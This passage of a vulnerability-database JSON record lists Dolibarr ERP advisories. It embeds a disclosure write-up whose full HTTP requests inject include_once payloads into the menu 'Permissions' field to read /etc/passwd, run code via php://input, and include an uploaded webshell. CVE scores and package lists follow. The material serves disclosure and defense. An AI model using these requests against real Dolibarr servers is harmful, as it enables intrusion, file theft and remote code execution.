close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('/etc/passwd')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165411557.png)\n\n(2) Then we look at the Menu we just created, and we can see that the contents of `/etc/passwd` have been successfully read out:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165517668.png)\n\n## Remote Code Execution - 1\n\n(1) We first ensure that the `allow_url_include` option of php.ini on the server is `On`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228160154464.png)\n\nAt this point, we can use remote file inclusion and cooperate with `php://input` to achieve arbitrary code execution.\n\n(2) Create a Menu and set \"Permissions\" to `include_once('php://input')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('php://input')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165822802.png)\n\n(3) Finally, the system command is successfully executed through the POST request:\n\n```http\nPOST http://192.168.31.31/htdocs/admin/menus/edit.php?menu_handler=all&action=edit&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=24 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 27\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/index.php?url=/etc/passwd\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\n\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165923443.png)\n\n## Remote Code Execution - 2 (File Inclusion with file upload)\n\nAt this point, we are absolutely sure that a file inclusion vulnerability can be achieved by setting \"Permissions\", and arbitrary code execution can be achieved with `allow_url_include = On`. However, the setting `allow_url_include = On` does not exist on every server. Therefore, to achieve the purpose of universal arbitrary code execution, we need to cooperate with the file upload (without suffix) function.\n\n(1) We can upload a file containing php webshell code through the \"Attach a new file/document\" function in `/htdocs/user/document.php?id=1&uploadform=1`. The file name is \"shell\" (this file There must be no suffix, otherwise the detection of `.` by `dol_eval()` cannot be bypassed when setting \"Permissions\" later. Among all file upload points, only \"Attach a new file/document\" can be Upload files without suffix):\n\n![image-20240228232622397](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232622397.png)\n\n(2) upload the \"shell\":\n\n![image-20240228231150328](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231150328.png)\n\nImages uploaded from here will eventually be saved on the server in the \"/var/www/html/documents/users/1/\" directory:\n\n![image-20240228230738376](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228230738376.png)\n\n(3)create a Menu and set \"Permissions\" to `include_once('/var/www/html/documents/users/1/shell')` (note that `''` must be used here because `\"` will be detected).\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=e71337659d7cbae16b0279b4e04535aa&menu_handler=all&user=2&type=left&propertymainmenu=whaoamia&menuIdParent=123&titre=whaoamia&picto=whaoamia&url=whaoamia&langs=&position=100&enabled=1&perms=include_once('/var/www/html/documents/users/1/shell')&target=&save=Save\n```\n\n(4) Finally, when we access the Menu we just created, we can find that the \"/var/www/html/documents/users/1/shell\" file is included:\n\n![image-20240228231800914](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231800914.png)\n\nFinally, arbitrary code execution was successfully achieved:\n\n![image-20240228231703417](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231703417.png)\n\n![image-20240228232116013](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232116013.png)\n\n# Impact\n\nThis vulnerability can run arbitrary commands in the file system and read sensitive files.\n\n# Say it at the end\n\nIf you confirm the vulnerability, please apply for a CVE to notify all users to update.","references":[{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2"},{"reference_url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2","reference_id":"GHSA-49xw-hw94-fmv2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2"}],"fixed_packages":[],"aliases":["GHSA-49xw-hw94-fmv2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rjd3-a1ds-skdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62702?format=json","vulnerability_id":"VCID-rtec-tutp-m3ep","summary":"Dolibarr ERP CRM before 19.0.2-php8.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"0.0048","scoring_system":"epss","scoring_elements":"0.65523","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0048","scoring_system":"epss","scoring_elements":"0.65623","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137"},{"reference_url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137","reference_id":"CVE-2024-40137","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/"}],"url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137","reference_id":"CVE-2024-40137","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137"},{"reference_url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8","reference_id":"GHSA-vprp-94p9-5jp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31892?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-40137","GHSA-vprp-94p9-5jp8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rtec-tutp-m3ep"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337022?format=json","vulnerability_id":"VCID-snwr-xzcb-rfdr","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.55988","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.56109","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957"},{"reference_url":"https://github.com/advisories/GHSA-c32w-3cqh-f6jx","reference_id":"GHSA-c32w-3cqh-f6jx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c32w-3cqh-f6jx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391503?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25957","GHSA-c32w-3cqh-f6jx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-snwr-xzcb-rfdr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208293?format=json","vulnerability_id":"VCID-spzz-de9a-g3gw","summary":"Logic error in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746","reference_id":"","reference_type":"","scores":[{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.4427","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44117","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21"},{"reference_url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746","reference_id":"CVE-2022-0746","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746"},{"reference_url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r","reference_id":"GHSA-8vq6-5f66-hp3r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0746","GHSA-8vq6-5f66-hp3r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-spzz-de9a-g3gw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/158767?format=json","vulnerability_id":"VCID-t393-s4zx-uyhs","summary":"An Improper Authorization vulnerability exists in Dolibarr versions prior to the 'develop' branch. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16574","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1643","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991"},{"reference_url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_id":"58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_id":"63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f"},{"reference_url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm","reference_id":"GHSA-wppr-j57c-8jpm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2021-3991","GHSA-wppr-j57c-8jpm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t393-s4zx-uyhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/132287?format=json","vulnerability_id":"VCID-tfxu-34ku-6uce","summary":"Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"0.05006","scoring_system":"epss","scoring_elements":"0.89938","published_at":"2026-06-11T12:55:00Z"},{"value":"0.05006","scoring_system":"epss","scoring_elements":"0.8997","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_id":"AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-62wf-h26v-5m57","reference_id":"GHSA-62wf-h26v-5m57","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-62wf-h26v-5m57"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38888","GHSA-62wf-h26v-5m57"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tfxu-34ku-6uce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/321294?format=json","vulnerability_id":"VCID-ufcd-e4r5-ekga","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-11825","reference_id":"","reference_type":"","scores":[{